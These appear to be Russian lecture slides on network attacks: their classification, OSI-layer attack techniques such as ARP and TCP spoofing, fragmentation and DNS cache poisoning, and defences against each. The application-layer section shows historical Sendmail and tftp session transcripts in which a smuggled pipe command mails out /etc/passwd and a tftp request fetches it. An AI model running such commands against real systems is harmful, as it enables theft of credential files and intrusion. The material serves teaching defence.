Можно сделать защиту от дурака, но только от неизобретательного. закон Нейсэра

СОДЕРЖАНИЕ I. Классификация атак II. Методы хакинга III. Виды атак VI. Действия взломщика V. Основные уязвимости корпоративной сети

СОСТАВНЫЕ ЧАСТИ ХАКИНГА УЯЗВИМОСТЬ УГРОЗА АТАКА

УЯЗВИМОСТЬ Любая характеристика или свойство информационной системы, использование которых нарушителем может привести к реализации угрозы. ошибки в программном коде человеческие ошибки и неправильная конфигурация настройки по умолчанию требования совместимости с другими системами запущенная, но неиспользуемая служба восприимчивость к атакам на отказ в обслуживании ошибки при проектировании

СЛЕДУЕТ ЛИ ПУБЛИКОВАТЬ СВЕДЕНИЯ О НОВЫХ УЯЗВИМОСТЯХ?

УГРОЗА Возможное событие, действие или процесс, которые посредством воздействия на компоненты информационной системы могут нарушить ее безопасность и нанести ущерб.

АТАКА Любое действие нарушителя, которое приводит к реализации угрозы путем использования уязвимостей информационной системы. Атакой принято считать и такие действия, которые направлены на поиск любых сведений об информационной системе.

команды пользователей сценарии или программы автономные агенты комплекты утилит распределенные средства уязвимости проектирования уязвимости реализации уязвимости конфигурации чтение файла расширение прав пользователя изменение конфигурации системы отказ в обслуживании Средство реализации атаки Уязвимость Событие безопасности КОМПОНЕНТЫ АТАКИ

I. КЛАССИФИКАЦИЯ АТАК

Цель атаки Метод атаки Традиционные средства защиты сосредоточены на изучении методов и целей атак. КАК ДЕЙСТВУЮТ ЗЛОУМЫШЛЕННИКИ? Атакующий

Цель атаки Атакующий МОДЕЛЬ ТРАДИЦИОННОЙ АТАКИ ( отношение «один к одному»)

Цели атаки Атакующий МОДЕЛЬ ТРАДИЦИОННОЙ АТАКИ (отношение «один ко многим»)

Цель атаки Промежуточный узел 1 Промежуточный узел 2 Атакующий МОДЕЛЬ АТАКИ ЧЕРЕЗ ПРОКСИ

Атакующие Цель атаки МОДЕЛЬ РАСПРЕДЕЛЕННОЙ АТАКИ (отношение «многие к одному»)

Цели атаки Атакующие МОДЕЛЬ РАСПРЕДЕЛЕННОЙ АТАКИ (ОТНОШЕНИЕ «МНОГИЕ КО МНОГИМ»)

Модели атак относительно канала связи: Прерывание Перехват Модификация Фальсификация

АТАКА ПУТЕМ ИСПОЛЬЗОВАНИЯ ПОДОБРАННОГО ПАРОЛЯ Interne t Межсетевой экран Коммутатор Маршрутизатор Сергей *****

АТАКА НА МЕЖСЕТЕВОЙ ЭКРАН Interne t Межсетевой экран Коммутатор Маршрутизатор

АТАКА ЧЕРЕЗ «ТРОЯНСКОГО КОНЯ» Interne t Рабочая станция (Resource) Рабочая станция Рабочая станция Рабочая станция Межсетевой экран Коммутатор Маршрутизатор SourceDestinationPortAction Trusted host Resource21Accept Внедрение «троянского коня» Trusted host

Маршрутизатор АТАКА ИЗ ДОВЕРЕННОЙ СЕТИ ЧЕРЕЗ VPN-СОЕДИНЕНИЕ Internet Межсетевой экран (с функцией VPN) Коммутатор Маршрутизатор Межсетевой экран (с функцией VPN) Коммутатор

Об опасностях не думали Повышенное внимание к вопросам безопасности при изобретении Интернета предотвратило бы многие нынешние проблемы, но тогда не исключено, что "всемирной паутины" просто бы не было, считает один из ее "отцов" Роберт Кан. Проблемам безопасности, таким, как вирусы, подлог или кража идентификатора, вначале не уделялось большого внимания. "Мы не думали о таких опасностях, хотя, наверно, следовало бы", - считает теперь Кан. 09 марта 2005

Причины успеха атак в Интернете (уязвимости проектирования) Недостаточные идентификация и аутентификация Отсутствие выделенного канала связи Взаимодействие объектов без установления виртуального канала Использование нестойких алгоритмов идентификации Отсутствие контроля за виртуальными каналами связи Невозможность контролировать маршрут сообщений Отсутствие полной информации об объектах и субъектах глобальной сети Отсутствие криптозащиты сообщений

II. МЕТОДЫ ХАКИНГА Если неприятность может произойти, она случается. Закон Мерфи

Атаки канального уровня модели OSI

Атака ARP-flood При получении большого количества пакетов с поддельными ARP-адресами, таблица соответствий коммутатора в конце концов переполнится. Коммутатор станет действовать, как обычный концентратор, то есть каждый пакет, полученный на любой порт, будет повторен по всем портам устройства, а не будет направлен на нужный. После чего можно использовать любой сниффер для перехвата пакетов. Таким образом, ни установление жестких привязок IP-адресов к MAC-адресам, ни организация коммутируемой среды не является панацеей от перехвата сетевого трафика.

Ложный ARP -сервер Перехватив на атакующем хосте внутри данного сегмента сети широковещательный ARP-запрос, можно послать ложный ARP- ответ, в котором объявить себя искомым хостом (например, маршрутизатором), и в дальнейшем активно контролировать сетевой трафик дезинформированного хоста.

Атакованный хост передает пакеты на ложный ARP- сервер. Ложный ARP-сервер посылает принятые от атакованного хоста пакеты на маршрутизатор. Маршрутизатор, получив ответа на запрос, адресует его непосредственно на хост, минуя ложный ARP-сервер. В совместно разделяемой среде маршрут пакетов образует петлю. Однако можно послать ARP-запрос, указав в качестве своего IP-адреса любой свободный в данном сегменте IP-адрес, и в дальнейшем вести работу с данного IP-адреса как с маршрутизатором, так и с "обманутыми" хостами.

Атаки сетевого уровня модели OSI

IPv4 Header (RFC 791)

Атаки с использованием полей заголовка IP Атака Ping of Death Total Length (16 bit) > октетов Атака Land Source Address = Destination Address Атака Smurf (ICMP) Source Address = жертва Destination Address = broadcast Атака при помощи фрагментации (Boink, Teardrop, сканирование) Flags – MF

Атаки транспортного уровня модели OSI

TCP Header (RFC 793)

Установка соединения TCP (RFC 793) 1. Хост А посылает TCP-пакет с флагом SYN; 2. Хост В посылает в ответ TCP-пакет с флагами SYN|ACK, если порт открыт. Или отказ в соединении, если порт неактивен флаг RST. 3. Хост А посылает TCP-пакет с флагом ACK. Пакет на стадии 1 имеет Sequence Number (ISN). Пакеты на стадии 2 и 3 имеют соответствующие Sequence Number и Acknowledgment Number. Таким образом, создается виртуальный канал связи, контролируемый последовательностью SN и AN.

Атаки с использованием полей заголовка ТСP Сканирование портов с некорректными комбинациями флагов SYN-сканер посылает только первый пакет из трех и ждет SYN|ACK или RST. Если пакет ACK и FIN послать в порт при неоткрытом соединении, всегда возвратится пакет с флагом RST. Послать FIN-пакет. Если принимающий хост возвращает RST, порт открыт, если RST не возвращается, значит, порт неактивен. Определение операционной системы по реакции на некорректные комбинации флагов Bogus (Reserved) Null (all flags 0) Xmas Tree (FIN|URG|PSH)

Как возникают уязвимости и атаки begin if then DENY; else ALLOW; end Так рассуждает кодер

Как возникают уязвимости и атаки (продолжение) Какова величина полезной нагрузки согласно RFC 791? Минимум 8 байтов. Устанавливаем флаг MF, разбиваем вложенный заголовок TCP (20 байтов) на два фрагмента (8+12). Где оказывается флаг SYN? Тринадцатый байт заголовка TCP окажется во втором фрагменте. Так рассуждает хакер Как анализирует пакетный фильтр В первом пакете TCP нет флага SYN. Значит, ALLOW.

АТАКА ПУТЕМ ПОДМЕНЫ АДРЕСА (TCP-spoofing) Interne t Межсетевой экран Коммутатор Маршрутизатор SourceDestinationPortAction Trusted host Resource2121Accept Доверенный узел (Trusted host)

Атака ТСP-спуфинга Если взломщик прослушивает сеанс связи: утилиты Hunt или Juggernaut (UNIX). Если взломщик определяет маршрут пакета: выставлена опция маршрутизации от источника (в современных сетевых системах игнорируется). Атака ТСР-спуфинга вслепую: Первая и последняя атака такого рода атака Кевина Митника на рабочую станцию Цутому Шимомуры в 1994 г.

Схема удаленной атаки на rsh-сервер была впервые описана Р. Т. Моррисом-старшим в 1970 году. Пусть хост А доверяет хосту В. Хост Х-Hacker - это станция атакующего. Вначале атакующий Х-Hacker открывает настоящее TCP- соединение с хостом В на любой TCP-порт (mail, echo и т. д.). В результате X-Hacker получает текущее на данный момент времени значение ISNb. Затем X-Hacker от имени хоста А посылает на хост В TCP-запрос на открытие соединения: SYN, ISSx. Получив этот запрос, В анализирует IP-адрес отправителя и решает, что пакет пришел с хоста А. Следовательно, в ответ хост В посылает на А новое значение ISNb': SYN, АСК, ISNb', ACK(ISSx+1). SYN, ISSx SYN, АСК, ISNb', ACK(ISSx+1 ) А В Х-Hacker

АСК, ISSx+l, ACK(ISNb'+l) RSTX-Hacker никогда не получит это сообщение от В, но, используя предыдущее значение ISNb и схему для получения ISNb', при помощи математического предсказания может послать пакет на В: АСК, ISSx+l, ACK(ISNb'+l). Для того, чтобы послать пакет, вероятно, потребуется перебрать некоторое количество возможных значений ACK(ISSb'+l). Подбирать ISSx+1 не нужно, так как этот параметр TCP-соединения был послан с хоста X-Hacker на объект В в первом пакете. А В Х-Hacker Но поскольку хост А не посылал на хост В никакого запроса, то, получив пакет SYN, АСК, ISNb', ACK(ISSx+1) он перешлет на В пакет с битом RST - закрыть соединение.

Следовательно, взломщику придется сначала на некоторое время вывести из строя хост А. В итоге rsh-сервер на хосте В считает, что к нему подключился пользователь с доверенного объекта А, тогда как на самом деле это атакующий с хоста X-Hacker. И хотя взломщик никогда не получит пакеты с хоста В, он сможет выполнять на нем r-команды. А В Х-Hacker SYN, АСК, ISNb', ACK(ISSx+1 ) Атака DoS В Х-Hacker SYN, АСК, ISNb', ACK(ISSx+1 ) АСК, ISSx+l, ACK(ISNb'+l) команды shell

Атака Кевина Митника Хрестоматийный случай ТСР-спуфинга.

Как хост генерирует ISN Есть 5 классов алгоритмов выбора ISN : 1. C (Constant). ISN не зависит от времени или изменяется очень медленно. 2. xK (например, 64K). ISN увеличивается на x при каждом подключении. 3. TD (Trivial Time Depency). ISN - линейная функция от времен и. 4. RI (Random Positive Increments). ISN - нелинейная монотонная функция от времени. 5. TR (Trully Random). ISN - немонотонная функция. Предсказание ISN возможно только в случае, если алгоритм генерации ISN принадлежит к первым трем классам.

Хронология отказа от TD (Trivial Time Depency) Linux избавился от TD уже во второй версии, и случилось это в 1994-м году. Windows NT после выхода SP5, в мае 1999-го года. NetBSD в январе 1998-го. FreeBSD в ноябре 1998-го. Solaris в том же году, с выходом версии 2.5. Все эти системы стали использовать генерацию ISN по алгоритму Truly Random. Как видим, в современных условиях атака ТСР-спуфинга вслепую практически невозможна.

Атаки сеансового уровня модели OSI В сети Интернет протоколом сеансового уровня является протокол TCP (он занимает и 4, и 5 уровни модели OSI). В отношении сеансового уровня очень широко распространена специфичная атака класса "отказ в сервисе", основанная на свойствах процедуры установления соединения в протоколе TCP. Она получила название SYN-Flood. При атаке типа SYN-Flood злоумышленник начинает посылать SYN- пакеты с произвольными (возможно, даже несуществующими) IP- адресами на имя атакуемого сервера по порту сервиса, который он хочет приостановить. Сервер будет постоянно держать свой буфер заполненным ожиданием соединений и не сможет обслужить SYN-запросы от настоящих легальных пользователей. На сеансовом уровне просто нельзя определить, какие из запросов фальшивые, а какие настоящие и могли бы иметь больший приоритет.

Атаки прикладного уровня модели OSI

Взлом Sendmail evil% telnet victim.com 25 … 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail < /etc/passwd" 250 "|/bin/mail < /etc/passwd"... Sender ok rcpt to: nosuchuser 550 nosuchuser... User unknown data 354 Enter mail, end with "." on a line by itself. 250 Mail accepted quit

Взлом сервера Apache Взлом Microsoft Internet Information Server (IIS) Взлом сервера tftp evil% tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit

Атаки на службу DNS С появлением автоматизированного инструментария сканирования при выходе в Internet серверы DNS подвергаются постоянному зондированию и попыткам вторжения. Здесь ничего нельзя поделать, так как серверы DNS должны отвечать на запросы. Только новый протокол DNSSEC, благодаря своим мощным криптографическим механизмам, в состоянии обеспечить одновременно аутентификацию и целостность всех аспектов DNS. Однако большинство серверов использует старый протокол DNS, который по-прежнему уязвим для злоупотреблений.

Для реализации атаки путем перехвата DNS-запроса необходимо перехватить запрос, извлечь из него номер UDP-порта хоста отправителя, двухбайтовое значение идентификатора запроса и искомое имя, послать DNS-ответ на UDP-порт отправителя, в ответе указать IP-адрес ложного DNS-сервера. Такой вариант атаки позволит полностью перехватить трафик между атакуемым хостом и запрошенным сервером.

Другой вариант атаки – создать направленный шторм ложных DNS-ответов. Взломщик осуществляет постоянную передачу на атакуемый хост заранее подготовленного ложного DNS-ответа от имени настоящего DNS-сервера без приема DNS-запроса. Номер порта отправителя принимает ограниченный набор значений (>= 1023), поэтому атакующему достаточно действовать простым перебором. Двухбайтовый идентификатор DNS-запроса либо равен единице, либо, в случае запроса, например, от Netscape Navigator, имеет значение, близкое к единице. Когда отправитель сделает DNS-запрос, он с большой вероятностью получит ложный ответ, направляющий его на сервер, контролируемый взломщиком.

Еще вариант атаки – направленный шторм ложных ответов на атакуемый DNS-сервер Атакующий может легко инициировать запрос к атакуемому серверу утилитой nslookup. Если на запрос от DNS-сервера атакующий направит ложный DNS- ответ или (в случае шторма ложных ответов) будет вести их постоянную передачу, то в кэш-таблице сервера появится соответствующая запись с ложными сведениями, и в дальнейшем все хосты, обратившиеся к данному DNS-серверу, будут дезинформированы. Произойдет отравление кэша DNS. Впрочем, DNS-сервер, посылая запрос на другой DNS-сервер, идентифицирует этот запрос двухбайтовым значением (ID), и угадать его простым перебором вряд ли возможно. Однако если взломщик прослушивает канал связи через захваченный плацдарм, он вполне может осуществить такую атаку.

ЭТАПЫ ОСУЩЕСТВЛЕНИЯ АТАКИ изучение окружения топология сети идентификация узлов сканирование портов идентификация ОС идентификация роли узла идентификация уязвимостей проникновение установление контроля чистка логов установка люков внедрение rootkit изменение прав доступа создание новых учетных записей Сбор информации Реализация атаки Завершение атаки

III. ВИДЫ АТАК

ВИДЫ АТАК СНИФФЕРЫ ПАКЕТОВ IP-СПУФИНГ ПАРОЛЬНЫЕ АТАКИ АТАКИ ТИПА Man-in-the Middle АТАКИ НА УРОВНЕ ПРИЛОЖЕНИЙ СЕТЕВАЯ РАЗВЕДКА ЗЛОУПОТРЕБЛЕНИЕ ДОВЕРИЕМ ПЕРЕАДРЕСАЦИЯ ПОРТОВ ВИРУСЫ И ПРИЛОЖЕНИЯ ТИПА «ТОЯНСКОГО КОНЯ» ОТКАЗ В ОБСЛУЖИВАНИИ Denial of Service DoS)

Сетевой разведкой называется сбор информации о сети с помощью общедоступных данных и приложений. При подготовке атаки против какой-либо сети хакер, как правило, пытается получить о ней как можно больше информации. Сетевая разведка проводится в форме запросов DNS, эхо-тестирования (ping sweep) и сканирования портов. Запросы DNS помогают понять, кто владеет тем или иным доменом и какие адреса этому домену присвоены. Эхо-тестирование (ping sweep) адресов, раскрытых с помощью DNS, позволяет увидеть, какие хосты реально работают в данной среде. Получив список хостов, хакер использует средства сканирования портов, чтобы составить полный список услуг, поддерживаемых этим хостом. И наконец, хакер анализирует характеристики приложений, работающих на хостах. СЕТЕВАЯ РАЗВЕДКА

Полностью избавиться от сетевой разведки невозможно. Если, к примеру, отключить эхо ICMP и эхо-ответ на периферийных маршрутизаторах, вы избавитесь от эхо- тестирования, но потеряете данные, необходимые для диагностики сетевых сбоев. Кроме того, сканировать порты можно и без предварительного эхо-тестирования. Просто это займет больше времени, так как сканировать придется и несуществующие IP-адреса.

Сниффер пакетов представляет собой прикладную программу, которая использует сетевую карту, работающую в режиме promiscuous mode (в этом режиме все пакеты, полученные по физическим каналам, сетевой адаптер отправляет приложению для обработки). При этом сниффер перехватывает все сетевые пакеты, которые передаются через определенный домен. В настоящее время снифферы работают в сетях на вполне законном основании. Они используются для диагностики неисправностей и анализа трафика. Однако ввиду того, что некоторые сетевые приложения передают данные в текстовом формате (Telnet, FTP, SMTP, РОРЗ и т.д.), с помощью сниффера можно узнать полезную, а иногда и конфиденциальную информацию (например, имена пользователей и пароли). СНИФФЕР ПАКЕТОВ

аутентификация; коммутируемая инфраструктура сети; контроль физических адресов (статические таблицы ARP, arpwatch); антиснифферы (так называемые антиснифферы измеряют время реагирования хостов и определяют, не приходится ли хостам обрабатывать лишний трафик. криптографическая защита канала. Угрозу сниффинга пакетов можно уменьшить с помощью следующих средств:

Обычно IP-спуфинг ограничивается вставкой ложной информации или вредоносных команд в обычный поток данных, передаваемых между клиентским и серверным приложением или по каналу связи между одноранговыми устройствами. Для двусторонней связи хакер должен изменить все таблицы маршрутизации, чтобы направить трафик на ложный IP-адрес. Некоторые взломщики, однако, даже не пытаются получить ответ от приложений. Если главная задача состоит в получении от системы важного файла, ответы приложений не имеют значения. Если же хакеру удается поменять таблицы маршрутизации и направить трафик на ложный IP-адрес, взломщик получит все пакеты и сможет отвечать на них так, будто он является санкционированным пользователем. Атаки IP-спуфинга часто являются отправной точкой для прочих атак. Классический пример атака DoS, которая начинается с чужого адреса, скрывающего истинного субъекта атаки. IP-СПУФИНГ

контроль доступа; фильтрация согласно RFC 2827 (Site Security Handbook ). Она позволяет заблокировать атаки, когда используются фальсифицированные адреса отправителя. Необходимо блокировать входящие пакеты с адресами: – вашей сети – частные (RFC 1918 и сеть ) – зарезервированные IANA адреса грамотная конфигурация хоста препятствует утечке информации. Угрозу спуфинга можно ослабить (но не устранить) с помощью следующих мер:

Атаки DoS не нацелены на получение доступа к сети или на получение из этой сети какой-либо информации. Атака DoS делает сеть недоступной для обычного использования за счет превышения допустимых параметров функционирования сети, операционной системы или приложения. Для некоторых серверных приложений (таких, как web- сервер или FTP-сервер) атаки DoS могут заключаться в том, чтобы занять все соединения, доступные для этих приложений, и держать их в занятом состоянии, не допуская обслуживания обычных пользователей. ОТКАЗ В ОБСЛУЖИВАНИИ (Denial of Service DoS)

функции антиспуфинга (согласно RFC 2827) функции антиDoS (например, Syn-cookie); ограничение объема трафика (traffic rate limiting). Угроза атак типа DoS может быть снижена тремя способами:

Парольные атаки проводятся взломщиками с помощью целого ряда методов, таких, как простой перебор (brute force attack), троянский конь и клавиатурный перехватчики сниффинг пакетов. Взломщики часто пытаются подобрать пароль и логин, используя для этого многочисленные попытки доступа. Такой подход носит название brute force attack (взлом грубой силой). ПАРОЛЬНЫЕ АТАКИ

Прежде всего, парольных атак можно избежать, если не пользоваться словарными паролями. Одноразовые пароли и/или криптографическая аутентификация могут практически свести на нет угрозу таких атак. Минимальная длина пароля должна быть не менее двенадцати символов. Пароль должен включать символы верхнего регистра, цифры и специальные #, %, $ и т.д. Категорически не рекомендуется использовать один пароль для доступа к разным службам и ресурсам. ПРОФИЛАКТИКА ПАРОЛЬНЫХ АТАК

АТАКИ ТИПА Man-in-the-Middle Для атаки типа Man-in-the-Middle взломщику нужен доступ к пакетам, передаваемым по сети. Такой доступ ко всем пакетам, передаваемым от провайдера в любую другую сеть, может, к примеру, получить взломщик, захвативший плацдарм в сети провайдера. Атаки проводятся с целью кражи информации, перехвата текущей сессии и получения доступа к частным сетевым ресурсам, для анализа трафика и получения информации о сети и ее пользователях, для проведения атак типа DoS, искажения передаваемых данных и ввода ложной информации в сетевые сессии.

Эффективно бороться с атаками типа Man-in-the- Middle можно только с помощью криптографии. Если хакер перехватит данные зашифрованной сессии, у него на экране появится не перехваченное сообщение, а бессмысленный набор символов. Однако, если взломщик получит информацию о криптографической сессии (например, ключ сессии), это может сделать возможной атаку Man-in-the- Middle даже в защищенной шифрованием среде. ПРОФИЛАКТИКА АТАК Man-in-the-Middle

Атаки на уровне приложений могут проводиться несколькими способами. Самый распространенный из них состоит в использовании уязвимостей серверного программного обеспечения (sendmail, BIND, OpenSSH и др.). Сведения об атаках на уровне приложений широко публикуются, чтобы дать возможность администраторам исправить проблему с помощью коррекционных модулей (патчей). Существенная проблема с атаками на уровне приложений состоит в том, что они часто пользуются портами, которым разрешен проход через межсетевой экран. К примеру, взломщик, эксплуатирующий известную ему уязвимость web- сервера, использует в ходе атаки 80-й порт TCP. Поскольку web-сервер предоставляет пользователям web-страницы, межсетевой экран должен предоставлять доступ к этому порту. С точки зрения межсетевого экрана, атака рассматривается как стандартный трафик для порта 80. АТАКИ НА УРОВНЕ ПРИЛОЖЕНИЙ

Полностью исключить атаки на уровне приложений невозможно. Самое главное здесь грамотное системное администрирование. Читайте лог-файлы операционных систем и сетевые лог-файлы и/или анализируйте их с помощью специальных аналитических приложений. Подпишитесь на услуги по рассылке данных о слабых местах прикладных программ: Bugtrad ( CERT ( Security Lab ( ПРОФИЛАКТИКА АТАК НА УРОВНЕ ПРИЛОЖЕНИЙ

Пользуйтесь самыми свежими версиями операционных систем и приложений и самыми последними коррекционными модулями (патчами). Серверы в DMZ должны обладать особо защищенной конфигурацией (бастионы). Кроме мероприятий системного администрирования, пользуйтесь системами распознавания атак (IDS). ПРОФИЛАКТИКА АТАК НА УРОВНЕ ПРИЛОЖЕНИЙ

Этот тип действий представляет собой злонамеренное использование отношений доверия, существующих в сети. Классическим примером такого злоупотребления является ситуация в периферийной части корпоративной сети. В этом сегменте часто располагаются серверы DNS, SMTP и HTTP. Поскольку все они принадлежат к одному и тому же сегменту, взлом одного из них приводит к взлому и всех остальных, так как эти серверы доверяют другим системам своей сети. Другим примером является система, установленная с внешней стороны межсетевого экрана, имеющая отношения доверия с системой, установленной с его внутренней стороны. В случае взлома внешней системы взломщик может использовать отношения доверия для проникновения в систему, защищенную межсетевым экраном. ЗЛОУПОТРЕБЛЕНИЕ ДОВЕРИЕМ

Риск злоупотребления доверием можно снизить за счет более жесткого контроля уровней доверия в пределах своей сети. Системы, расположенные с внешней стороны межсетевого экрана или в DMZ, никогда не должны пользоваться абсолютным доверием со стороны защищенных экраном систем. Отношения доверия должны ограничиваться определенными протоколами и, по возможности, аутентифицироваться не только по IP-адресам, но и по другим параметрам, например, по сертификату. НАСТРОЙКА ОТНОШЕНИЙ ДОВЕРИЯ

Переадресация портов представляет собой разновидность злоупотребления доверием, когда взломанный хост используется для передачи через межсетевой экран графика, который в противном случае был бы обязательно отбракован. Если взломщик захватит хост, он сможет установить на нем программное средство, перенаправляющее трафик через разрешенные порты. Хотя при этом не нарушается ни одно правило, действующее на экране, внешний хост в результате переадресации получает прямой доступ к защищенному хосту. Кроме того, канал связи со взломанным хостом может быть инкапсулирован в пакетах HTTP либо ICMP. ПЕРЕАДРЕСАЦИЯ ПОРТОВ

Основным способом борьбы с переадресацией портов и инкапсуляцией является использование надежных моделей доверия, как уже было сказано. Кроме того, помешать взломщику установить на хосте свои программные средства может хост- система IDS (HIDS). Обнаружение нелегального трафика может осуществляться через системы сбора сетевой статистики. В случае возникновения подозрений необходимо воспользоваться утилитой перехвата и анализа трафика (Ethereal, Analyzer и им подобные). ПРОФИЛАКТИКА ПЕРЕАДРЕСАЦИИ ПОРТОВ

Вирусами называются вредоносные программы, которые внедряются в другие программы для выполнения определенной нежелательной функции на рабочей станции конечного пользователя. Троянский конь это программная вставка или же настоящая программа, которая выглядит как полезное приложение, а на деле выполняет вредную роль. Примером типичного троянского коня является программа, которая выглядит, как простая игра для рабочей станции пользователя. Пока пользователь играет в игру, программа отправляет свою копию по электронной почте каждому абоненту, занесенному в адресную книгу этого пользователя. Все его абоненты получают по почте игру, вызывая ее дальнейшее распространение. ВИРУСЫ И «ТРОЯНСКИЕ КОНИ»

Борьба с вирусами и троянскими конями Наиболее эффективна эшелонированная защита с помощью антивирусного программного обеспечения, работающего как на пользовательском уровне, так и на уровне сети. Антивирусные средства обнаруживают большинство вирусов и троянских коней и успешно пресекают их распространение.